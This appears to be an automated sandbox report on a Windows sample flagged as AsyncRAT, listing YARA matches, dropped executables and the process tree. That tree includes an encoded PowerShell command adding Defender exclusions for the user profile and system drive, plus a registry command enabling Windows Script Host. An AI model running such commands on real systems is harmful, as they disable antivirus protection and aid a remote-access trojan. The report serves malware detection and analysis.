Source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 7432, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0520B578	1_2_0520B578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0520B568	1_2_0520B568
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C278A	3_2_030C278A
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C11E8	3_2_030C11E8
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C14C8	3_2_030C14C8
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C1E3A	3_2_030C1E3A
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C2AC0	3_2_030C2AC0
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C2837	3_2_030C2837
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C1502	3_2_030C1502
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C1579	3_2_030C1579
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C14B9	3_2_030C14B9
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Code function: 3_2_030C1A6F	3_2_030C1A6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 10_2_067765C0	10_2_067765C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 10_2_06775CF0	10_2_06775CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 10_2_06773500	10_2_06773500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 10_2_0677A878	10_2_0677A878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 10_2_067759A8	10_2_067759A8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F205C	12_2_014F205C
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F278A	12_2_014F278A
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F11E8	12_2_014F11E8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F14C8	12_2_014F14C8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F207B	12_2_014F207B
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F2837	12_2_014F2837
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F2AC0	12_2_014F2AC0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F1579	12_2_014F1579
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F14B9	12_2_014F14B9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F78E0	12_2_014F78E0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F78F0	12_2_014F78F0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_014F1A6F	12_2_014F1A6F
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072C8C80	12_2_072C8C80
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072CB3BC	12_2_072CB3BC
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072C9FD0	12_2_072C9FD0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072C85B1	12_2_072C85B1
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072C85C0	12_2_072C85C0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072CE3CD	12_2_072CE3CD
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072CE3D0	12_2_072CE3D0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072C8C2C	12_2_072C8C2C
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_072C9FC1	12_2_072C9FC1
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_08174198	12_2_08174198
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_08174188	12_2_08174188
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_08178CF9	12_2_08178CF9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_08178D08	12_2_08178D08
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_081CD480	12_2_081CD480
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_081CED68	12_2_081CED68
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_081B0006	12_2_081B0006
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 12_2_081B0040	12_2_081B0040
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A1278C	16_2_01A1278C
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A111E8	16_2_01A111E8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A114C8	16_2_01A114C8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A11E3A	16_2_01A11E3A
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A12837	16_2_01A12837
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A12AC0	16_2_01A12AC0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A11502	16_2_01A11502
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A11579	16_2_01A11579
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A114B9	16_2_01A114B9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A1791C	16_2_01A1791C
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A178E0	16_2_01A178E0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A178F0	16_2_01A178F0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_01A11A6F	16_2_01A11A6F
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07AF8C80	16_2_07AF8C80
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07AFB3BC	16_2_07AFB3BC
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07AF9FC1	16_2_07AF9FC1
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07AF85B1	16_2_07AF85B1
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07AF85C0	16_2_07AF85C0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Code function: 16_2_07AF8C2C	16_2_07AF8C2C

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Vulvvmkewji.exe 0D9C95A567B68AEA53A66B961220A6D5FF14134A91A7EE3B31DEC8A9EC74FAFA
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Lxfrfbi.exe 0D9C95A567B68AEA53A66B961220A6D5FF14134A91A7EE3B31DEC8A9EC74FAFA

Source: Office Installer.exe.0.dr

Static PE information: Number of sections : 17 > 10

Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.sfx.exe, vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.exe, vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: to be able to be painted.XF-NF6f076MLTSC2024-1203-4fb4OriginalFilenameProject393-9fb6WQ6bf4NT1040QC-KK869GBOffice 2013 kk-kz1041kk-KZGD9GF-K981159YV6-22PColombiaadd "HKCU\Software\Microsoft\Office\16.0\Common" /v "qmenable" /t REG_DWORD /d 0 /fDogfood_Canary1042PRX-QV9JF-G3Caribbean# vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1680581407.0000000004092000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVulvvmkewji.exe< vs Gm602axA2d.exe

Source: Gm602axA2d.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe

Process created: C:\Windows\System32\reg.exe "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f

Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000011.00000002.2103131027.0000000005465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.2133699444.0000000009596000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.2027914076.00000000070E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000011.00000002.2121649452.000000000703C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 7432, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: classification engine

Classification label: mal100.troj.evad.winEXE@23/17@0/1

Source: C:\Users\user\Desktop\Gm602axA2d.exe

File created: C:\Users\user\AppData\Local\Vulvvmkewji.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Mutant created: \Sessions\1\BaseNamedObjects\Llg9a02PERRO
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03

Source: C:\Users\user\Desktop\Gm602axA2d.exe

File created: C:\Users\user\AppData\Local\Temp\Office Installer.exe

Jump to behavior

Source: Gm602axA2d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Gm602axA2d.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Gm602axA2d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Gm602axA2d.exe	ReversingLabs: Detection: 76%
Source: Gm602axA2d.exe	Virustotal: Detection: 60%

Source: C:\Users\user\Desktop\Gm602axA2d.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_0-82

Source: unknown	Process created: C:\Users\user\Desktop\Gm602axA2d.exe "C:\Users\user\Desktop\Gm602axA2d.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Users\user\AppData\Local\Vulvvmkewji.exe "C:\Users\user\AppData\Local\Vulvvmkewji.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Users\user\AppData\Local\Temp\Office Installer.exe "C:\Users\user\AppData\Local\Temp\Office Installer.exe"
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Process created: C:\Windows\System32\reg.exe "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe "C:\Users\user\AppData\Roaming\Lxfrfbi.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe "C:\Users\user\AppData\Roaming\Lxfrfbi.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Users\user\AppData\Local\Vulvvmkewji.exe "C:\Users\user\AppData\Local\Vulvvmkewji.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Users\user\AppData\Local\Temp\Office Installer.exe "C:\Users\user\AppData\Local\Temp\Office Installer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Process created: C:\Windows\System32\reg.exe "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f	Jump to behavior
